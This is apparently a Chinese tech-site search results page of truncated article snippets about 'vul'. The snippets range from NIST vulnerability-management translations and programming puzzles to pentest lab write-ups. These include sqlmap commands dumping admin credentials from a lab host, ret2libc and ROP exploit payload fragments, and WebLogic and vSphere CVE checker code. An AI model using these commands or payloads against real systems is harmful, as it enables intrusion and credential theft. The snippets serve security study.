展开

关键词

小蜜蜂公益译文 -- NISTIR 8011 第4卷 安全控制评估自动化支持:软件漏洞管理(下)

低RA-5(b)VUL-F01低RA-5(c)VUL-F01低RA-5(d)VUL-F01低RA-5(e)VUL-F01低SI-2(a)VUL-F01低SI-2(c)VUL-F01低SI-2(d)VUL-F01 SP 800-53控制项代号VUL-Q02低RA-5(a)VUL-Q02低RA-5(b)VUL-Q02低RA-5(c)VUL-Q02低SI-2(a)VUL-Q02低SI-2(b)VUL-Q02中RA- SP 800-53控制项代号VUL-Q03低RA-5(a)VUL-Q03低RA-5(c)VUL-Q03低SI-2(a)VUL-Q03低SI-2(b)VUL-Q03中SI-2(2)VUL-Q03高SI- 800-53控制项代号VUL-Q04低RA-5(a)VUL-Q04低RA-5(b)VUL-Q04低RA-5(c)VUL-Q04低SI-2(a)VUL-Q04低SI-2(b)VUL-Q04低SI-2(c 低RA-5(c)VUL-L01低RA-5(d)VUL-L01低RA-5(e)VUL-L01低SI-2(a)VUL-L01低SI-2(c)VUL-L01低SI-2(d)VUL-L01中SA-11(d)VUL-L01

10430

CFS三层靶机渗透

r=vul&keyword=1 #测试注入点发现是mysql数据库 proxychains sqlmap -u http:192.168.22.2index.php? r=vul&keyword=1 -p keyword --dbs #查看数据库? proxychains sqlmap -u http:192.168.22.2index.php? r=vul&keyword=1 -p keyword -D bagecms -T bage_admin --columns? r=vul&keyword=1 -p keyword -D bagecms -T bage_admin -C username,password --dump? r=vul&keyword=1 order by 39 --+查库名http:192.168.22.2index.php?

62830
  • 广告
    关闭

    90+款云产品免费体验

    提供包括云服务器,云数据库在内的90+款云计算产品。打造一站式的云产品试用服务,助力开发者和企业零门槛上云。

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    小蜜蜂公益译文 -- NISTIR 8011 第4卷 安全控制评估自动化支持:软件漏洞管理(上)

    1.3内容简介 第2节简要介绍了VUL能力,确定了范围和目的,提供了VUL能力补充信息的链接。 第3节详细介绍了VUL缺陷检测以及如何使用缺陷检测来自动评估支持VUL能力的NISTSP 800-53安全控制和控制项的有效性。 VUL能力可检测目标网络中已加载或运行中的有漏洞软件,并根据组织的策略进行响应。识别有漏洞的软件可以缓解漏洞。VUL能力依赖软件资产管理(SWAM)能力提供已安装软件的清单。 VUL安全能力仅限于在图1和表1所列的攻击步骤中拦截或延缓攻击。?图1. VUL对攻击步骤模型的影响 图1说明图1所示的攻击步骤仅限于对抗性攻击。 期望状态的VUL能力数据需求示例见表4。表3. VUL实际状态数据需求示例?表4. VUL期望状态数据需求示例?a该值由组织根据其分配给资产的值定义。有关设备属性的说明,参见 。

    13360

    【每日一题】问题 1241: 盐水的故事(题目取自ACM训练)

    ,现在有一个问题:这瓶盐水一共有VUL毫升,每一滴是D毫升,每一滴的速度是一秒(假设最后一滴不到D毫升,则花费的时间也 算一秒),停一下的时间也是一秒这瓶水什么时候能挂完呢? 输入输入数据占一行,由VUL和D组成,其中0< D< VUL< 5000。输出请输出挂完盐水需要的时间。样例输入10 1 样例输出13

    611110

    python处理XML解析(读取)

    读末尾的文本(结束标记之后,下一开始标记或父元素标记结束之前)还是以上面的xml为例子优雅的访问:# -*-coding:utf-8 -*-__author__ = Administrator class Vul             temp = Vul.Vul(name, ip, sys_aff, desc, cveNo, cve_desc, cncve)            vuls.append(temp)for vul  in vuls:    print vul.vul_name,vul.cncve,vul.cveNo,vul.desc,vul

    25120

    HDOJ(HDU) 1408 盐水的故事

    Problem Description 挂盐水的时候,如果滴起来有规律,先是滴一滴,停一下;然后滴二滴,停一下;再滴三滴,停一下…,现在有一个问题:这瓶盐水一共有VUL毫升,每一滴是D毫升,每一滴的速度是一秒 Input 输入数据包含多个测试实例,每个实例占一行,由VUL和D组成,其中 0import java.util.Scanner; public class Main{ public static void

    12930

    ret2libc过地址随机化

    首先,这是我们进行实验的1.c文件,我们可以利用gets()函数来进行溢出#include char buf2=this is buf2;void vul(){char buf1;gets(buf1); }void main(){write(1,sinxx,5);vul();}我们将其编译设置为栈不可执行和地址随机化gcc -m32 -fno-stack-protector -no-pie -o 1.exe 进程e=ELF(1.exe)加载1.exe文件,分析ELF结构addr_write=e.pltaddr_gets=e.gotgets函数最后的真实地址在got表中addr_vul=e.symbols由于vul 函数是自定义函数,所以在符号表中找到vul的地址print pidof(p)便于进行调试offset=22pause()payload1=offset*a+p32(addr_write)+p32(addr_vul addrvul)+p32(1)+p32(addr_gets)+p32(4)我们在call一个函数的时候会先将这个函数的地址压入堆栈,然后将执行完函数要跳转到的地址压入堆栈,再将函数的参数压入堆栈,我们将vul

    29520

    CVE-2016-3510:Weblogic反序列化

    #coding:utf-8import socketimport timeimport reimport argparsefrom multiprocessing.dummy import Pool VUL res def checkVul(res,server_addr,index): p=re.findall(VER_SIG, res, re.S) if len(p)>0: print(%s:%d vul %s%(server_addr,server_addr,VUL)) return True else: print(%s:%d is not vul %s % (server_addr,server_addr ,VUL)) return False def run(dip,dport,index): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM ,index) def exp(target): dip,dport = target vuls = ) if checkVul(rs,server_addr,index): vuls.append(VUL

    17220

    WebLogic CVE-2018-2628漏洞验证

    resdef checkVul(res, server_addr, index): p=re.findall(VER_SIG, res, re.S) if len(p)>0: return {}:{} is vul {}.format(server_addr, server_addr, VUL) else: return {}:{} is not vul {}.format(server_addr, server_addr , VUL)def run(*args): dip = args dport = args sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM

    33410

    ROP-Ret2csu详解

    checksec看到程序是64位的,并且在程序中找不到rdx、rsi、edi时利用_libc_csu_init函数中的两个代码片段来实现这三个参数的传递确定gadget1、gadget2的地址由于程序中vul 函数并未执行过,而call函数的用法是跳转到某地址内所保存的地址,但此时的vul地址内并没有真实地址,所以这里要考虑绕过call这个调用,直接通过retn跳转至vul处(真实地址) 这里通过init_array_start 函数的指针来跳过call 函数是ELF程序的一个初始化函数,运行它不会对栈空间造成影响,可以说是用于跳过call指令的最佳选择构造payload进行溢出,返回结果直接到vul函数的上 EXP#-*- coding

    42620

    CVE-2021-21972:vSphere Client RCE复现

    requests.get( URL + VUL_URI, verify=False, timeout=TIMEOUT, headers=headers ) print( Check {URL} is vul ....format(URL=URL)) if res.status_code == 405: print( {URL} IS vul ....format(URL=URL)) return True else: print( {URL} is NOT vul ....format(URL=URL)) return False except: print( {URL} connect failed

    46920

    基于Chorme headless的xss检测实践

    chrome_headless_drive.run()scan_result结果:1# level 3 代表触发了Page.javascriptDialogOpening事件2{url: uhttp:xss.php, vul : xss, post: , method: uGET, level: 3}3# level 2 代表dom树的节点包含了我们自定义的标签4{url: uhttp:xss.php, vul: xss, post: , method: uGET, level: 2}5# level 1 代表渲染后的nodeValue包含我们的payload6{url: uhttp:xss.php, vul: xss,

    65240

    小蜜蜂公益译文 -- NISTIR 8011 第4卷 安全控制评估自动化支持:软件漏洞管理(附录)

    的控制措施的关键词规则自动进行关键字搜索,识别NIST SP 800-53中可用于支持VUL能力的候选控制项。 搜索到候选控制项后,手动检查每个控制项的语言内容,将支持VUL能力的控制项(真)与不支持VUL能力的控制项(假)区分开来。有关低、中、高基线控制项目的信息,见表8、表9和表10。 用于标识VUL控制措施的特定关键字规则如下表所示。 *高风险区域*确保软件在移至高风险区域的位置或环境之前得到妥善修补*非持久*或*持久*确保软件从持久可信来源加载,且该来源所包含的缺陷已消除或修补*漏洞*和*扫描*确保软件漏洞已识别并修复附录C对支持VUL 高与审计记录分析(而非VUL能力)相关CA-2 (2)安全评估|专业评估组织的安全控制评估包括按【赋值:组织定义的频率】,【选择:通知,不通知】,【选择(一个或多个):深度监控;漏洞扫描;恶意用户测试;

    11830

    WebLogic wls9-async 反序列化漏洞(CNVD-C-2019-48814)复现

    影响范围WebLogic 10.X、WebLogic 12.1.3环境搭建使用vul的镜像安装好docker 和docker-compose之后直接在本地生成一个文件:内容如下:version: 2services

    82120

    fscan:一键自动化、全方位漏洞扫描的开源工具

    string Select scan type ,as: -m ssh (default all) -no not to save output log -nopoc not to scan web vul

    1.1K30

    MIPS漏洞调试环境安装-栈溢出

    测试#includeint vul(char* src){ char output={0}; strcpy(output,src); printf(%sn,output); return 0;}int

    58150

    Java 反序列化工具 gadgetinspector 初窥(下)

    ; public class TestDemo { 测试拓扑排序的正确性 private String test; public String pMethod(String arg){ String vul = cMethod(arg); return vul; } public String cMethod(String arg){ return arg.toUpperCase(); } } AbstractTableModel.java

    53220

    NCSC发布最常被黑客入侵的密码列表 你的是否也在其中?

    敏感文件等渗透测试常用攻击字典目前字典的目录大概分布如下: 账户字典 |-常用弱密码 |-常用账户名 |-中国人名拼音 |-常用手机号 fuzz字典 |-LDAP注入 |-SQL注入 |-XSS攻击 |-文件遍历 |-XXE |-vul

    35430

    关于CPU漏洞Spectre的详细分析

    (图 2.1)图 2.1是一段利用分支执行漏洞的代码,有这段代码才能在分支预算并推测执行,我们要获取的是放入内存中的secret “Topsec test this vul!!“这段字符。 图2.2编号2中的len=24就是我们“Topsec test this vul!!

    50470

    nmap使用了解

    intrusive:可能会使目标崩溃,消耗过度的资源,或者通过恶意行为冲击目标系统malware:在目标主机上寻找恶意软件感染迹象safe:尽量不用负面的方式影响目标version:估计目标主机显示的软件或协议版本vul

    17130

    相关产品

    • 云函数

      云函数

      云函数(Serverless Cloud Function,SCF)是腾讯云为企业和开发者们提供的无服务器执行环境,帮助您在无需购买和管理服务器的情况下运行代码。您只需使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯云基础设施上弹性、安全地运行代码。SCF 是实时文件处理和数据处理等场景下理想的计算平台。

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券